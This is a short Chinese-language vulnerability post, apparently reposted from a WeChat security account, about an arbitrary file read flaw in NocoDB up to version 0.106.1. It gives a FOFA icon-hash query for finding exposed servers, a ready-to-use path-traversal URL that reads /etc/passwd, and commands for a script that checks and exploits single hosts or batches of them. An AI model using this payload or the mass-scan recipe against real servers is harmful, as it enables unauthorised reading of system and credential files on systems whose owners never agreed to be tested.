NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。
NocoDB<=0.106.1fofa查询
icon_hash="-2017596142"poc
http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd浏览器直接访问
单个检测
python .\NocoDBReadfile.py -u http://ip:port批量检测与利用
python .\NocoDBReadfile.py -f filename注: 无法访问不一定漏洞不存在,由于网络问题,国外网站无法访问,也会导致无法访问的现象
关注微信公众号 网络安全透视镜 回复 20231008-2 获取批量检测脚本
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247497537&idx=2&sn=cc1c9fa6535d6bdfff2e803aff746f6e&chksm=974c5079a03bd96f83263ee8411f359d046d18f52d4a04030ba2fc60f8067182d849ad11af84&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh